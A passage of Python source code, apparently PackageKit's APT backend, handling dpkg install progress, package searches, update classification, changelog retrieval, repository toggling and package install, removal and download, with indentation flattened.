os.environ["DEBCONF_PIPE"] = frontend_socket
os.environ["DEBIAN_FRONTEND"] = "passthrough"
else:
os.environ["DEBIAN_FRONTEND"] = "noninteractive"
# Force terminal messages in dpkg to be untranslated, status-fd or
# debconf prompts won't be affected
os.environ["DPKG_UNTRANSLATED_MESSAGES"] = "1"
# We also want untranslated status messages from apt on status-fd
locale.setlocale(locale.LC_ALL, "C")
return pid
def update_interface(self):
apt.progress.base.InstallProgress.update_interface(self)
# Collect the output from the package manager
try:
out = os.read(self.master_fd, 512)
self.output = self.output + out
pklog.debug("APT out: %s " % out)
except OSError:
pass
# catch a time out by sending crtl+c
if self.last_activity + TIMEOUT_IDLE_INSTALLATION < time.time():
pklog.critical("no activity for %s seconds sending ctrl-c" \
% TIMEOUT_IDLE_INSTALLATION)
os.write(self.master_fd, chr(3))
msg = "Transaction was cancelled since the installation " \
"of a package hung.\n" \
"This can be caused by maintainer scripts which " \
"require input on the terminal:\n%s" % self.output
raise PKError(enums.ERROR_PACKAGE_FAILED_TO_CONFIGURE,
format_string(msg))
def conffile(self, current, new):
pklog.warning("Config file prompt: '%s' (sending no)" % current)
self.conffile_prompts.add(new)
def error(self, pkg, msg):
try:
pkg = self._backend._cache[pkg]
except KeyError:
err_enum = enums.ERROR_TRANSACTION_FAILED
else:
if pkg.marked_delete:
err_enum = enums.ERROR_PACKAGE_FAILED_TO_REMOVE
elif pkg.marked_keep:
# Should be called in the case of triggers
err_enum = enums.ERROR_PACKAGE_FAILED_TO_CONFIGURE
else:
err_enum = enums.ERROR_PACKAGE_FAILED_TO_INSTALL
raise PKError(err_enum, self.output)
def finish_update(self):
pklog.debug("finishUpdate()")
if self.conffile_prompts:
self._backend.message(enums.MESSAGE_CONFIG_FILES_CHANGED,
"The following conffile prompts were found "
"and need investigation: %s" % \
"\n".join(self.conffile_prompts))
# Check for required restarts
if os.path.exists("/var/run/reboot-required") and \
os.path.getmtime("/var/run/reboot-required") > self.start_time:
self._backend.require_restart(enums.RESTART_SYSTEM, "")
class PackageKitDpkgInstallProgress(PackageKitInstallProgress):
"""Class to initiate and monitor installation of local package
files with dpkg.
"""
def recover(self):
"""Run 'dpkg --configure -a'."""
cmd = [apt_pkg.config.find_file("Dir::Bin::Dpkg"),
"--status-fd", str(self.writefd),
"--root", apt_pkg.config["Dir"],
"--force-confdef", "--force-confold"]
cmd.extend(apt_pkg.config.value_list("Dpkg::Options"))
cmd.extend(("--configure", "-a"))
self.run(cmd)
def install(self, filenames):
"""Install the given package using a dpkg command line call."""
cmd = [apt_pkg.config.find_file("Dir::Bin::Dpkg"),
"--force-confdef", "--force-confold",
"--status-fd", str(self.writefd),
"--root", apt_pkg.config["Dir"]]
cmd.extend(apt_pkg.config.value_list("Dpkg::Options"))
cmd.append("-i")
cmd.extend([str(f) for f in filenames])
self.run(cmd)
def run(self, cmd):
"""Run and monitor a dpkg command line call."""
pklog.debug("Executing: %s" % cmd)
(self.master_fd, slave) = pty.openpty()
fcntl.fcntl(self.master_fd, fcntl.F_SETFL, os.O_NONBLOCK)
p = subprocess.Popen(cmd, stdout=slave, stdin=slave)
self.child_pid = p.pid
res = self.wait_child()
return res
if REPOS_SUPPORT == True:
class PackageKitSoftwareProperties(softwareproperties.SoftwareProperties.SoftwareProperties):
"""
Helper class to fix a siily bug in python-software-properties
"""
def set_modified_sourceslist(self):
self.save_sourceslist()
class PackageKitAptBackend(PackageKitBaseBackend):
"""PackageKit backend for APT"""
def __init__(self, cmds=""):
pklog.info("Initializing APT backend")
signal.signal(signal.SIGQUIT, self._sigquit)
self._cache = None
self._last_cache_refresh = None
apt_pkg.init_config()
apt_pkg.config.set("DPkg::Options::", '--force-confdef')
apt_pkg.config.set("DPkg::Options::", '--force-confold')
PackageKitBaseBackend.__init__(self, cmds)
self._init_plugins()
# Methods ( client -> engine -> backend )
@catch_pkerror
def search_file(self, filters, filenames):
"""Search for files in packages.
Works only for installed files if apt-file isn't installed.
"""
pklog.info("Searching for file: %s" % filenames)
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
result_names = set()
# Optionally make use of apt-file's Contents cache to search for not
# installed files. But still search for installed files additionally
# to make sure that we provide up-to-date results
if (os.path.exists("/usr/bin/apt-file") and
enums.FILTER_INSTALLED not in filters):
#FIXME: Make use of rapt-file on Debian if the network is available
#FIXME: Show a warning to the user if the apt-file cache is several
# weeks old
pklog.debug("Using apt-file")
filenames_regex = []
for filename in filenames:
if filename.startswith("/"):
pattern = "^%s$" % filename[1:].replace("/", "\/")
else:
pattern = "\/%s$" % filename
filenames_regex.append(pattern)
cmd = ["/usr/bin/apt-file", "--regexp", "--non-interactive",
"--package-only", "find", "|".join(filenames_regex)]
pklog.debug("Calling: %s" % cmd)
apt_file = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = apt_file.communicate()
if apt_file.returncode == 0:
#FIXME: Actually we should check if the file is part of the
# candidate, e.g. if unstable and experimental are
# enabled and a file would only be part of the
# experimental version
result_names.update(stdout.split())
self._emit_visible_packages_by_name(filters, result_names)
else:
raise PKError(enums.ERROR_INTERNAL_ERROR,
format_string("%s %s" % (stdout, stderr)))
# Search for installed files
filenames_regex = []
for filename in filenames:
if filename.startswith("/"):
pattern = "^%s$" % filename.replace("/", "\/")
else:
pattern = ".*\/%s$" % filename
filenames_regex.append(pattern)
files_pattern = re.compile("|".join(filenames_regex))
for pkg in self._cache:
if pkg.name in result_names:
continue
for installed_file in pkg.installed_files:
if files_pattern.match(installed_file):
self._emit_visible_package(filters, pkg)
break
@catch_pkerror
def search_group(self, filters, groups):
"""Search packages by their group."""
pklog.info("Searching for groups: %s" % groups)
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
for pkg in self._cache:
if self._get_package_group(pkg) in groups:
self._emit_visible_package(filters, pkg)
@catch_pkerror
def search_name(self, filters, values):
"""Search packages by name."""
def matches(searches, text):
for search in searches:
if not search in text:
return False
return True
pklog.info("Searching for package name: %s" % values)
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
for pkg_name in self._cache.keys():
if matches(values, pkg_name):
self._emit_all_visible_pkg_versions(filters,
self._cache[pkg_name])
@catch_pkerror
def search_details(self, filters, values):
"""Search packages by details."""
pklog.info("Searching for package details: %s" % values)
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
results = []
if XAPIAN_SUPPORT == True:
search_flags = (xapian.QueryParser.FLAG_BOOLEAN |
xapian.QueryParser.FLAG_PHRASE |
xapian.QueryParser.FLAG_LOVEHATE |
xapian.QueryParser.FLAG_BOOLEAN_ANY_CASE)
pklog.debug("Performing xapian db based search")
db = xapian.Database(XAPIAN_DB)
parser = xapian.QueryParser()
parser.set_default_op(xapian.Query.OP_AND)
query = parser.parse_query(" ".join(values), search_flags)
enquire = xapian.Enquire(db)
enquire.set_query(query)
matches = enquire.get_mset(0, 1000)
for pkg_name in (match.document.get_data()
for match in enquire.get_mset(0, 1000)):
if pkg_name in self._cache:
self._emit_visible_package(filters, self._cache[pkg_name])
else:
def matches(searches, text):
for search in searches:
if not search in text:
return False
return True
pklog.debug("Performing apt cache based search")
values = [val.lower() for val in values]
for pkg in self._cache:
txt = pkg.name
try:
txt += pkg.candidate.raw_description.lower()
txt += pkg.candidate._translated_records.long_desc.lower()
except AttributeError:
pass
if matches(values, txt):
self._emit_visible_package(filters, pkg)
@catch_pkerror
def get_distro_upgrades(self):
"""
Implement the {backend}-get-distro-upgrades functionality
"""
pklog.info("Get distro upgrades")
self.status(enums.STATUS_INFO)
self.allow_cancel(False)
self.percentage(None)
if META_RELEASE_SUPPORT == False:
if "update-manager-core" in self._cache and \
self._cache["update-manager-core"].is_installed == False:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"Please install the package update-manager-core "
"to get notified of the latest distribution "
"releases.")
else:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"Please make sure that update-manager-core is"
"correctly installed.")
return
#FIXME Evil to start the download during init
meta_release = MetaReleaseCore(False, False)
#FIXME: should use a lock
while meta_release.downloading:
time.sleep(1)
#FIXME: Add support for description
if meta_release.new_dist != None:
self.distro_upgrade("stable",
"%s %s" % (meta_release.new_dist.name,
meta_release.new_dist.version),
"The latest stable release")
@catch_pkerror
def get_updates(self, filters):
"""Get available package updates."""
def succeeds_security_update(pkg):
"""
Return True if an update succeeds a previous security update
An example would be a package with version 1.1 in the security
archive and 1.1.1 in the archive of proposed updates or the
same version in both archives.
"""
for version in pkg.versions:
# Only check versions between the installed and the candidate
if (pkg.installed and
apt_pkg.version_compare(version.version,
pkg.installed.version) <= 0 and
apt_pkg.version_compare(version.version,
pkg.candidate.version) > 0):
continue
for origin in version.origins:
if origin.origin in ["Debian", "Ubuntu"] and \
(origin.archive.endswith("-security") or \
origin.label == "Debian-Security") and \
origin.trusted:
return True
return False
#FIXME: Implment the basename filter
pklog.info("Get updates")
self.status(enums.STATUS_QUERY)
self.allow_cancel(True)
self.percentage(None)
self._check_init(progress=False)
# Start with a safe upgrade
self._cache.upgrade(dist_upgrade=True)
# Search for upgrades which are not already part of the safe upgrade
# but would only require the installation of additional packages
for pkg in self._cache:
if not pkg.is_upgradable:
continue
# This may occur on pinned packages which have been updated to
# later version than the pinned one
if not pkg.candidate.origins:
continue
if not pkg.marked_upgrade:
#FIXME: Would be nice to have a reason here why
self._emit_package(pkg, enums.INFO_BLOCKED,
force_candidate=True)
# The update can be safely installed
info = enums.INFO_NORMAL
# Detect the nature of the upgrade (e.g. security, enhancement)
candidate_origin = pkg.candidate.origins[0]
archive = candidate_origin.archive
origin = candidate_origin.origin
trusted =candidate_origin.trusted
label = candidate_origin.label
if origin in ["Debian", "Ubuntu"] and trusted == True:
if archive.endswith("-security") or label == "Debian-Security":
info = enums.INFO_SECURITY
elif succeeds_security_update(pkg):
pklog.debug("Update of %s succeeds a security update. "
"Raising its priority." % pkg.name)
info = enums.INFO_SECURITY
elif archive.endswith("-backports"):
info = enums.INFO_ENHANCEMENT
elif archive.endswith("-updates"):
info = enums.INFO_BUGFIX
if origin in ["Backports.org archive"] and trusted == True:
info = enums.INFO_ENHANCEMENT
self._emit_package(pkg, info, force_candidate=True)
self._cache.clear()
@catch_pkerror
def get_update_detail(self, pkg_ids):
"""Get details about updates."""
def get_bug_urls(changelog):
"""Return a list of urls pointing to closed bugs in the
changelog.
"""
urls = []
for r in re.findall(MATCH_BUG_CLOSES_DEBIAN, changelog,
re.IGNORECASE | re.MULTILINE):
urls.extend([HREF_BUG_DEBIAN % bug for bug in \
re.findall(MATCH_BUG_NUMBERS, r)])
for r in re.findall(MATCH_BUG_CLOSES_UBUNTU, changelog,
re.IGNORECASE | re.MULTILINE):
urls.extend([HREF_BUG_UBUNTU % bug for bug in \
re.findall(MATCH_BUG_NUMBERS, r)])
return urls
def get_cve_urls(changelog):
"""Return a list of urls pointing to CVEs reports referred to in
the changelog.
"""
return [HREF_CVE % c for c in re.findall(MATCH_CVE, changelog,
re.MULTILINE)]
pklog.info("Get update details of %s" % pkg_ids)
self.status(enums.STATUS_DOWNLOAD_CHANGELOG)
self.percentage(0)
self.allow_cancel(True)
self._check_init(progress=False)
total = len(pkg_ids)
for count, pkg_id in enumerate(pkg_ids):
self.percentage(count * 100 / total)
pkg = self._get_package_by_id(pkg_id)
# FIXME add some real data
if pkg.installed.origins:
installed_origin = pkg.installed.origins[0].label
else:
installed_origin = ""
updates = "%s;%s;%s;%s" % (pkg.name, pkg.installed.version,
pkg.installed.architecture,
installed_origin)
obsoletes = ""
vendor_url = ""
restart = "none"
update_text = ""
state = ""
issued = ""
updated = ""
#FIXME: make this more configurable. E.g. a dbus update requires
# a reboot on Ubuntu but not on Debian
if pkg.name.startswith("linux-image-") or \
pkg.name in ["libc6"]:
restart == enums.RESTART_SYSTEM
#FIXME: Should be part of python-apt
changelog_dir = apt_pkg.config.find_dir("Dir::Cache::Changelogs")
if changelog_dir == "/":
changelog_dir = os.path.join(apt_pkg.config.find_dir("Dir::"
"Cache"),
"Changelogs")
filename = os.path.join(changelog_dir,
"%s_%s.gz" % (pkg.name,
pkg.candidate.version))
changelog_raw = ""
if os.path.exists(filename):
pklog.debug("Reading changelog from cache")
changelog_file = gzip.open(filename, "rb")
try:
changelog_raw = changelog_file.read().decode("UTF-8")
finally:
changelog_file.close()
if not changelog_raw:
pklog.debug("Downloading changelog")
changelog_raw = pkg.get_changelog()
# The internal download error string of python-apt ist not
# provided as unicode object
if not isinstance(changelog_raw, unicode):
changelog_raw = changelog_raw.decode("UTF-8")
else:
# Write the changelog to the cache
if not os.path.exists(changelog_dir):
os.makedirs(changelog_dir)
# Remove obsolete cached changelogs
pattern = os.path.join(changelog_dir, "%s_*.gz" % pkg.name)
for old_changelog in glob.glob(pattern):
os.remove(os.path.join(changelog_dir, old_changelog))
with gzip.open(filename, mode="wb") as changelog_file:
changelog_file.write(changelog_raw.encode("UTF-8"))
# Convert the changelog to markdown syntax
changelog = ""
for line in changelog_raw.split("\n"):
if line == "":
changelog += " \n"
else:
changelog += " %s \n" % line
if line.startswith(pkg.candidate.source_name):
match = re.match(r"(?P<source>.+) \((?P<version>.*)\) "
"(?P<dist>.+); urgency=(?P<urgency>.+)",
line)
update_text += "%s\n%s\n\n" % (match.group("version"),
"=" * \
len(match.group("version")))
elif line.startswith(" "):
update_text += " %s \n" % line
elif line.startswith(" --"):
#FIXME: Add %z for the time zone - requires Python 2.6
update_text += " \n"
match = re.match("^ -- (?P<maintainer>.+) (?P<mail><.+>) "
"(?P<date>.+) (?P<offset>[-\+][0-9]+)$",
line)
date = datetime.datetime.strptime(match.group("date"),
"%a, %d %b %Y %H:%M:%S")
issued = date.isoformat()
if not updated:
updated = date.isoformat()
if issued == updated:
updated = ""
bugzilla_url = ";;".join(get_bug_urls(changelog))
cve_url = ";;".join(get_cve_urls(changelog))
self.update_detail(pkg_id, updates, obsoletes, vendor_url,
bugzilla_url, cve_url, restart,
format_string(update_text),
format_string(changelog),
state, issued, updated)
@catch_pkerror
def get_details(self, pkg_ids):
"""Emit details about packages."""
pklog.info("Get details of %s" % pkg_ids)
self.status(enums.STATUS_INFO)
self.percentage(None)
self.allow_cancel(True)
self._check_init(progress=False)
total = len(pkg_ids)
for count, pkg_id in enumerate(pkg_ids):
self.percentage(count * 100 / total)
version = self._get_version_by_id(pkg_id)
#FIXME: We need more fine grained license information!
if (version.origins and
version.origins[0].component in ["main", "universe"] and
version.origins[0].origin in ["Debian", "Ubuntu"]):
license = "free"
else:
license = "unknown"
group = self._get_package_group(pkg)
self.details(pkg_id, license, group,
format_string(version.description),
version.homepage, version.size)
@catch_pkerror
@lock_cache
def update_system(self, only_trusted):
"""Upgrade the system."""
pklog.info("Upgrading system")
self.status(enums.STATUS_UPDATE)
self.allow_cancel(False)
self.percentage(0)
self._check_init()
self._cache.upgrade()
#FIXME: Emit message about skipped updates
# for pkg in self._cache:
# if pkg.is_upgradable and pkg.marked_upgrade:
# continue
self._check_trusted(only_trusted)
self._commit_changes()
@catch_pkerror
@lock_cache
def repair_system(self, only_trusted):
"""Recover from broken dependencies."""
pklog.info("Repairing system")
self.status(enums.STATUS_DEP_RESOLVE)
self.allow_cancel(False)
self.percentage(0)
self._check_init(fail_broken=False)
try:
self._cache._depcache.fix_broken()
except SystemError:
broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"The following packages would break and so block"
"the removal: %s" % " ".join(broken))
self._check_trusted(only_trusted)
self._commit_changes()
@catch_pkerror
def simulate_repair_system(self):
"""Simulate recovery from broken dependencies."""
pklog.info("Simulating system repair")
self.status(enums.STATUS_DEP_RESOLVE)
self.allow_cancel(False)
self.percentage(0)
self._check_init(fail_broken=False)
try:
self._cache._depcache.fix_broken()
except SystemError:
broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"The following packages would break and so block"
"the removal: %s" % " ".join(broken))
self._emit_changes()
@catch_pkerror
@lock_cache
def remove_packages(self, allow_deps, auto_remove, ids):
"""Remove packages."""
pklog.info("Removing package(s): id %s" % ids)
self.status(enums.STATUS_REMOVE)
self.allow_cancel(False)
self.percentage(0)
self._check_init()
if auto_remove:
auto_removables = [pkg.name for pkg in self._cache \
if pkg.is_auto_removable]
pkgs = self._mark_for_removal(ids)
# Check if the removal would remove further packages
if not allow_deps and self._cache.delete_count != len(ids):
dependencies = [pkg.name for pkg in self._cache.get_changes() \
if pkg.name not in pkgs]
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"The following packages would have also to be "
"removed: %s" % " ".join(dependencies))
if auto_remove:
self._check_obsoleted_dependencies()
#FIXME: Should support only_trusted
self._commit_changes(install_start=10, install_end=90)
self._open_cache(start=90, end=99)
for pkg_name in pkgs:
if pkg_name in self._cache and self._cache[pkg_name].is_installed:
raise PKError(enums.ERROR_PACKAGE_FAILED_TO_INSTALL,
"%s is still installed" % pkg_name)
self.percentage(100)
def _check_obsoleted_dependencies(self):
"""Check for no longer required dependencies which should be removed
too.
"""
installed_deps = set()
with self._cache.actiongroup():
for pkg in self._cache:
if pkg.marked_delete:
installed_deps = self._installed_dependencies(pkg.name,
installed_deps)
for dep_name in installed_deps:
if dep_name in self._cache:
pkg = self._cache[dep_name]
if pkg.is_installed and pkg.is_auto_removable:
pkg.mark_delete(False)
def _installed_dependencies(self, pkg_name, all_deps=None):
"""Recursivly return all installed dependencies of a given package."""
#FIXME: Should be part of python-apt
# apt.packagek.Version.get_dependencies(recursive=True)
if not all_deps:
all_deps = set()
if not pkg_name in self._cache:
return all_deps
cur = self._cache[pkg_name]._pkg.current_ver
if not cur:
return all_deps
for sec in ("PreDepends", "Depends", "Recommends"):
try:
for dep in cur.depends_list[sec]:
dep_name = dep[0].target_pkg.name
if not dep_name in all_deps:
all_deps.add(dep_name)
all_deps |= self._installed_dependencies(dep_name,
all_deps)
except KeyError:
pass
return all_deps
@catch_pkerror
def simulate_remove_packages(self, ids):
"""Emit the change required for the removal of the given packages."""
pklog.info("Simulating removal of package with id %s" % ids)
self.status(enums.STATUS_DEP_RESOLVE)
self.allow_cancel(True)
self.percentage(None)
self._check_init(progress=False)
pkgs = self._mark_for_removal(ids)
self._emit_changes(pkgs)
def _mark_for_removal(self, ids):
"""Resolve the given package ids and mark the packages for removal."""
pkgs = []
with self._cache.actiongroup():
resolver = apt.cache.ProblemResolver(self._cache)
for id in ids:
version = self._get_version_by_id(id)
pkg = version.package
if not pkg.is_installed:
raise PKError(enums.ERROR_PACKAGE_NOT_INSTALLED,
"Package %s isn't installed" % pkg.name)
if pkg.installed != version:
raise PKError(enums.ERROR_PACKAGE_NOT_INSTALLED,
"Version %s of %s isn't installed" % \
(version.version, pkg.name))
if pkg.essential == True:
raise PKError(enums.ERROR_CANNOT_REMOVE_SYSTEM_PACKAGE,
"Package %s cannot be removed." % pkg.name)
pkgs.append(pkg.name[:])
pkg.mark_delete(False, False)
resolver.clear(pkg)
resolver.protect(pkg)
resolver.remove(pkg)
try:
resolver.resolve()
except SystemError as error:
broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"The following packages would break and so block"
"the removal: %s" % " ".join(broken))
return pkgs
@catch_pkerror
def get_repo_list(self, filters):
"""
Implement the {backend}-get-repo-list functionality
FIXME: should we use the abstration of software-properties or provide
low level access using pure aptsources?
"""
pklog.info("Getting repository list: %s" % filters)
self.status(enums.STATUS_INFO)
self.allow_cancel(False)
self.percentage(0)
if REPOS_SUPPORT == False:
if ("python-software-properties" in self._cache and
not self._cache["python-software-properties"].is_installed):
raise PKError(enums.ERROR_INTERNAL_ERROR,
"Please install the package "
"python-software-properties to handle "
"repositories")
else:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"Please make sure that python-software-properties" " is correctly installed.")
repos = PackageKitSoftwareProperties()
# Emit distro components as virtual repositories
for comp in repos.distro.source_template.components:
repo_id = "%s_comp_%s" % (repos.distro.id, comp.name)
description = "%s %s - %s (%s)" % (repos.distro.id,
repos.distro.release,
comp.get_description().decode("UTF-8"),
comp.name)
#FIXME: There is no inconsitent state in PackageKit
enabled = repos.get_comp_download_state(comp)[0]
if not enums.FILTER_DEVELOPMENT in filters:
self.repo_detail(repo_id,
format_string(description),
enabled)
# Emit distro's virtual update repositories
for template in repos.distro.source_template.children:
repo_id = "%s_child_%s" % (repos.distro.id, template.name)
description = "%s %s - %s (%s)" % (repos.distro.id,
repos.distro.release,
template.description.decode("UTF-8"),
template.name)
#FIXME: There is no inconsitent state in PackageKit
enabled = repos.get_comp_child_state(template)[0]
if not enums.FILTER_DEVELOPMENT in filters:
self.repo_detail(repo_id,
format_string(description),
enabled)
# Emit distro's cdrom sources
for source in repos.get_cdrom_sources():
if enums.FILTER_NOT_DEVELOPMENT in filters and \
source.type in ("deb-src", "rpm-src"):
continue
enabled = not source.disabled
# Remove markups from the description
description = re.sub(r"</?b>", "", repos.render_source(source))
repo_id = "cdrom_%s_%s" % (source.uri, source.dist)
repo_id.join(["_%s" % c for c in source.comps])
self.repo_detail(repo_id, format_string(description), enabled)
# Emit distro's virtual source code repositoriy
if not enums.FILTER_NOT_DEVELOPMENT in filters:
repo_id = "%s_source" % repos.distro.id
enabled = repos.get_source_code_state() or False
#FIXME: no translation :(
description = "%s %s - Source code" % (repos.distro.id,
repos.distro.release)
self.repo_detail(repo_id, format_string(description), enabled)
# Emit third party repositories
for source in repos.get_isv_sources():
if enums.FILTER_NOT_DEVELOPMENT in filters and \
source.type in ("deb-src", "rpm-src"):
continue
enabled = not source.disabled
# Remove markups from the description
description = re.sub(r"</?b>", "", repos.render_source(source))
repo_id = "isv_%s_%s" % (source.uri, source.dist)
repo_id.join(["_%s" % c for c in source.comps])
self.repo_detail(repo_id,
format_string(description.decode("UTF-8")),
enabled)
@catch_pkerror
def repo_enable(self, repo_id, enable):
"""
Implement the {backend}-repo-enable functionality
FIXME: should we use the abstration of software-properties or provide
low level access using pure aptsources?
"""
pklog.info("Enabling repository: %s %s" % (repo_id, enable))
self.status(enums.STATUS_RUNNING)
self.allow_cancel(False)
self.percentage(0)
if REPOS_SUPPORT == False:
if ("python-software-properties" in self._cache and
not self._cache["python-software-properties"].is_installed):
raise PKError(enums.ERROR_INTERNAL_ERROR,
"Please install the package "
"python-software-properties to handle "
"repositories")
else:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"Please make sure that python-software-properties"
"is correctly installed.")
return
repos = PackageKitSoftwareProperties()
found = False
# Check if the repo_id matches a distro component, e.g. main
if repo_id.startswith("%s_comp_" % repos.distro.id):
for comp in repos.distro.source_template.components:
if repo_id == "%s_comp_%s" % (repos.distro.id, comp.name):
if enable == repos.get_comp_download_state(comp)[0]:
pklog.debug("Repository is already enabled")
pass
if enable == True:
repos.enable_component(comp.name)
else:
repos.disable_component(comp.name)
found = True
break
# Check if the repo_id matches a distro child repository, e.g.
# hardy-updates
elif repo_id.startswith("%s_child_" % repos.distro.id):
for template in repos.distro.source_template.children:
if repo_id == "%s_child_%s" % (repos.distro.id, template.name):
if enable == repos.get_comp_child_state(template)[0]:
pklog.debug("Repository is already enabled")
pass
elif enable == True:
repos.enable_child_source(template)
else:
repos.disable_child_source(template)
found = True
break
# Check if the repo_id matches a cdrom repository
elif repo_id.startswith("cdrom_"):
for source in repos.get_isv_sources():
source_id = "cdrom_%s_%s" % (source.uri, source.dist)
source_id.join(["_%s" % c for c in source.comps])
if repo_id == source_id:
if source.disabled == enable:
source.disabled = not enable
repos.save_sourceslist()
else:
pklog.debug("Repository is already enabled")
found = True
break
# Check if the repo_id matches an isv repository
elif repo_id.startswith("isv_"):
for source in repos.get_isv_sources():
source_id = "isv_%s_%s" % (source.uri, source.dist)
source_id.join(["_%s" % c for c in source.comps])
if repo_id == source_id:
if source.disabled == enable:
source.disabled = not enable
repos.save_sourceslist()
else:
pklog.debug("Repository is already enabled")
found = True
break
if found == False:
raise PKError(enums.ERROR_REPO_NOT_AVAILABLE,
"The repository %s isn't available" % repo_id)
@catch_pkerror
@lock_cache
def update_packages(self, only_trusted, ids):
"""Update packages."""
pklog.info("Updating package with id %s" % ids)
self.status(enums.STATUS_UPDATE)
self.allow_cancel(False)
self.percentage(0)
self._check_init()
pkgs = self._mark_for_upgrade(ids)
self._check_trusted(only_trusted)
self._commit_changes()
self._open_cache(start=90, end=100)
self.percentage(100)
pklog.debug("Checking success of operation")
for pkg_name in pkgs:
if (pkg_name not in self._cache or
not self._cache[pkg_name].is_installed or
self._cache[pkg_name].is_upgradable):
raise PKError(enums.ERROR_PACKAGE_FAILED_TO_INSTALL,
"%s was not updated" % pkg_name)
pklog.debug("Sending success signal")
@catch_pkerror
def simulate_update_packages(self, ids):
"""Emit the changes required for the upgrade of the given packages."""
pklog.info("Simulating update of package with id %s" % ids)
self.status(enums.STATUS_DEP_RESOLVE)
self.allow_cancel(True)
self.percentage(None)
self._check_init(progress=False)
pkgs = self._mark_for_upgrade(ids)
self._emit_changes(pkgs)
def _mark_for_upgrade(self, ids):
"""Resolve the given package ids and mark the packages for upgrade."""
pkgs = []
with self._cache.actiongroup():
resolver = apt.cache.ProblemResolver(self._cache)
for id in ids:
version = self._get_version_by_id(id)
pkg = version.package
if not pkg.is_installed:
raise PKError(enums.ERROR_PACKAGE_NOT_INSTALLED,
"%s isn't installed" % pkg.name)
# Check if the specified version is an update
if apt_pkg.version_compare(pkg.installed.version,
version.version) >= 0:
raise PKError(enums.ERROR_UPDATE_NOT_FOUND,
"The version %s of %s isn't an update to the "
"current %s" % (version.version, pkg.name,
pkg.installed.version))
pkg.candidate = version
pkgs.append(pkg.name[:])
pkg.mark_install(False, True)
resolver.clear(pkg)
resolver.protect(pkg)
try:
resolver.resolve()
except SystemError as error:
broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"The following packages block the installation: "
"%s" % " ".join(broken))
return pkgs
@catch_pkerror
def download_packages(self, dest, ids):
"""Download packages to the given destination."""
def get_download_details(ids):
"""Calculate the start and end point of a package download
progress.
"""
total = 0
downloaded = 0
versions = []
# Check if all ids are vaild and calculate the total download size
for id in ids:
pkg_ver = self._get_pkg_version_by_id(id)
if not pkg_ver.downloadable:
raise PKError(enums.ERROR_PACKAGE_DOWNLOAD_FAILED,
"package %s isn't downloadable" % id)
total += pkg_ver.size
versions.append((id, pkg_ver))
for id, ver in versions:
start = downloaded * 100 / total
end = start + ver.size * 100 / total
yield id, ver, start, end
downloaded += ver.size
pklog.info("Downloading packages: %s" % ids)
self.status(enums.STATUS_DOWNLOAD)
self.allow_cancel(True)
self.percentage(0)
# Check the destination directory
if not os.path.isdir(dest) or not os.access(dest, os.W_OK):
raise PKError(enums.ERROR_INTERNAL_ERROR,
"The directory '%s' is not writable" % dest)
# Setup the fetcher
self._check_init()
# Start the download
for id, ver, start, end in get_download_details(ids):
progress = PackageKitAcquireProgress(self, start, end)
self._emit_pkg_version(ver, enums.INFO_DOWNLOADING)
try:
ver.fetch_binary(dest, progress)
except Exception as error:
raise PKError(enums.ERROR_PACKAGE_DOWNLOAD_FAILED,
format_string(str(error)))
else:
self.files(id, os.path.join(dest,
os.path.basename(ver.filename)))
self._emit_pkg_version(ver, enums.INFO_FINISHED)
self.percentage(100)
@catch_pkerror
@lock_cache
def install_packages(self, only_trusted, ids):
"""Install the given packages."""
pklog.info("Installing package with id %s" % ids)
self.status(enums.STATUS_INSTALL)
self.allow_cancel(False)
self.percentage(0)
self._check_init()
pkgs = self._mark_for_installation(ids)
self._check_trusted(only_trusted)
self._commit_changes()
self._open_cache(start=90, end=100)
self.percentage(100)
pklog.debug("Checking success of operation")
for p in pkgs:
if p not in self._cache or not self._cache[p].is_installed:
raise PKError(enums.ERROR_PACKAGE_FAILED_TO_INSTALL,
"%s was not installed" % p)
@catch_pkerror
def simulate_install_packages(self, ids):
"""Emit the changes required for the installation of the given
packages.
"""
pklog.info("Simulating installing package with id %s" % ids)
self.status(enums.STATUS_DEP_RESOLVE)
self.allow_cancel(True)
self.percentage(None)
self._check_init(progress=False)
pkgs = self._mark_for_installation(ids)
self._emit_changes(pkgs)
def _mark_for_installation(self, ids):
"""Resolve the given package ids and mark the packages for
installation.
"""
pkgs = []
with self._cache.actiongroup():
resolver = apt.cache.ProblemResolver(self._cache)
for id in ids:
version = self._get_version_by_id(id)
pkg = version.package
pkg.candidate = version
if pkg.installed == version:
raise PKError(enums.ERROR_PACKAGE_ALREADY_INSTALLED,
"Package %s is already installed" % pkg.name)
pkgs.append(pkg.name[:])
pkg.mark_install(False, True, True)
resolver.clear(pkg)
resolver.protect(pkg)
try:
resolver.resolve()
except SystemError as error:
broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
"The following packages block the installation: "
"%s" % " ".join(broken))
return pkgs
@catch_pkerror
@lock_cache
def install_files(self, only_trusted, inst_files):
"""Install local Debian package files."""
pklog.info("Installing package files: %s" % inst_files)
self.status(enums.STATUS_INSTALL)
self.allow_cancel(False)
self.percentage(0)
self._check_init()
packages = []
# Collect all dependencies which need to be installed
self.status(enums.STATUS_DEP_RESOLVE)
for path in inst_files:
deb = apt.debfile.DebPackage(path, self._cache)
packages.append(deb)
if not deb.check():
raise PKError(enums.ERROR_LOCAL_INSTALL_FAILED,
format_string(deb._failure_string))
(install, remove, unauthenticated) = deb.required_changes
